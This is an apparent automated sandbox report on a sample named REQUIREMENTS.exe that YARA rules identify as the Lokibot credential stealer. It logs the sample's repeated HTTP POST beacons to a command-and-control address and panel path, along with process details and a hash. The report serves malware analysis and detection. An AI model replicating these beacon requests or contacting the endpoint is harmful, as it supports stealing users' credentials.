                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:45.538139105 CET224INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:45 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                61192.168.2.54978645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:45.753910065 CET225OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:45.839142084 CET226INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:46 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                62192.168.2.54978745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:46.050626040 CET226OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:46.138545990 CET227INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:46 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                63192.168.2.54978845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:46.355514050 CET228OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:46.439142942 CET228INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:46 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                64192.168.2.54978945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:46.647783041 CET229OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:46.734167099 CET229INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:46 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                65192.168.2.54979045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:46.941621065 CET230OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:47.027401924 CET231INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:47 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                66192.168.2.54979145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:47.243097067 CET231OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:47.328789949 CET232INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:47 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                67192.168.2.54979245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:47.530968904 CET233OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:47.616408110 CET233INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:47 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                68192.168.2.54979345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:47.832191944 CET234OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:47.918045998 CET235INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:48 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                69192.168.2.54979445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:48.152251959 CET235OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:48.237951040 CET236INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:48 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.2.54972745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:28.460179090 CET86OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:28.545113087 CET87INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:28 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                70192.168.2.54979545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:48.456401110 CET237OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:48.543643951 CET237INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:48 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                71192.168.2.54979645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:48.747611046 CET238OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:48.833098888 CET239INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:49 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                72192.168.2.54979745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:49.043704987 CET239OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:49.129441977 CET240INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:49 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                73192.168.2.54979845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:49.344821930 CET241OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:49.433993101 CET241INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:49 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                74192.168.2.54979945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:49.644541025 CET242OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:49.731252909 CET243INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:49 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                75192.168.2.54980045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                76192.168.2.54980145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                77192.168.2.54980245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                78192.168.2.54980345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                79192.168.2.54980445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.2.54972845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:28.750068903 CET88OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:28.836009026 CET88INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:29 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                80192.168.2.54980545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                81192.168.2.54980645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                82192.168.2.54980745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                83192.168.2.54980845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                84192.168.2.54980945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                85192.168.2.54981045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                86192.168.2.54981145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                87192.168.2.54981245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                88192.168.2.54981345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                89192.168.2.54981445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.2.54972945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:29.038505077 CET89OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:29.124325037 CET89INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:29 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                90192.168.2.54981545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                91192.168.2.54981645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                92192.168.2.54981745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                93192.168.2.54981845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                94192.168.2.54981945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                95192.168.2.54982045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                96192.168.2.54982145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                97192.168.2.54982245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                98192.168.2.54982345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                99192.168.2.54982445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: REQUIREMENTS.exe PID: 4324 Parent PID: 5756

                General

                Start time:09:58:20
                Start date:03/12/2020
                Path:C:\Users\user\Desktop\REQUIREMENTS.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\REQUIREMENTS.exe'
                Imagebase:0x730000
                File size:538112 bytes
                MD5 hash:70109889C622058FD38E3B14965CA813
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Analysis Process: REQUIREMENTS.exe PID: 5344 Parent PID: 4324

                General

                Start time:09:58:23
                Start date:03/12/2020
                Path:C:\Users\user\Desktop\REQUIREMENTS.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\REQUIREMENTS.exe
                Imagebase:0xd90000
                File size:538112 bytes
                MD5 hash:70109889C622058FD38E3B14965CA813
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.505715239.000000000149C000.00000004.00000020.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.505673008.0000000001487000.00000004.00000020.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.505542408.0000000001458000.00000004.00000020.sdmp, Author: Joe Security
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >